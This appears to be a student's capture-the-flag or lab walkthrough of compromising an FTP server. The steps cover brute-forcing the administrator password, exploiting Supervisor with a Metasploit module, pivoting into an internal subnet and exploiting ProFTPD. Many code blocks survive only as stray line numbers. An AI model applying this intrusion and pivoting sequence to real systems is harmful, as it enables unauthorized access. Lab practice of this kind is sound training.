Steps Taken:
1. Scan with NMAP the first target machine:
1
- Port 21 = ftp is open!
2. Preparing Metasploit:
3. Searching for exploit and executing it:
1
- This isn't vulnerable to this exploit!
4. Check out if anonymous users are allowed using Metasploit module:
1
msf > search anonymous
1
- Shows that anon login works but you can only read files on the FTP server!
5. Now, log into the FTP server:
1
# ftp {ip}
6. Explore the File system of the FTP server + download any hint you could find:
1
- It tells us to login using 'administrator' account.
7. Logging into ‘administrator’ account WITHOUT password:
1
2
- The log in failed. Try to brute force the password for this user then!
- Note that from previous experience, we can't use Hydra to brute force the password of an unknown user whether a user actually exists in the FTP server but in this case, we can actually bruteforce a password of a known user. This means that knowing usernames that exist in the servers helps us acquire their password indirectly.
8. Bruteforcing the password of the user ‘administrator’:
1
2
3
- Trying PASS_FILE = /root/wordlists/100-common-passwords.txt : doesn't work!
- Trying PASS_FILE = /usr/share/wordlists/metasploit/password.lst : doesn't work!
- Trying PASS_FILE = /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt :
9. Logging into the FTP webserver using the ‘administrator’ account:
1
- Found the password!
1
2
3
4
- Now, download the 'files' directory!
# wget -r ftp://administrator:babygirl@192.27.155.3/
-> This is wrong since we won't need to download this directory.
10. Putting a file named ‘startsuper’ at /files directory in the administrator account.
1
2
3
4
5
6
7
# touch startsuper
...(after logging in../in another terminal)
ftp > put startsuper
-> Note that this file is relative to the directory where you are when you log into the FTP server which in this case is /root.
-> Recap: We did this because of a note:
11. Now, you have to wait for the “Supervisor” to run in the FTP server! Then, scan the target FTP machine with NMAP:
1
# nmap -sS -sV {target}
1
- Now, new port opened serving a new service which in this case is Supervisor process manager.
12. Using ‘curl’ to do GET request on the new service:
1
# curl -v http://{target-ip}:9001
1
- Notice that at the moment, there are no programs this service is managing.
13. Finding exploits this service is vulnerable in:
1
- This exploit affects Supervisor(Medusa) with versions 3.0a1 to 3.3.2.
14. Using exploit/linux/http/supervisor_xmlrpc_exec:
1
- The exploit works!
15. Checking the internal subnet this compromised machine might be connected to as well:
16. Creating a pivot using this compromised machine:
1
2
3
msf > search autoroute
-> Setup autoroute
...
17. Portscan the internal subnet using portscan/tcp Metasploit module:
1
2
3
msf > search portscan/tcp
...
- Set it up!
18. Do an NMAP scan on this internal network machine(2nd target).
1
2
3
- Use 'portfwd' in Meterpreter to do port forwarding to be able to use nmap locally so you won't have to use proxychains.
meterpreter > portfwd add -l 1234 -p 21 -r 192.36.1.3
1
2
# nmap -sS -sV -p1234 localhost
- Note this is done on ANOTHER TERMINAL!
19. Check an exploit for this ProFTPD version.
1
2
msf > search proftpd
...
20. Executing the exploit:
21. Find the flag and print it!
1
# find / -iname *flag*
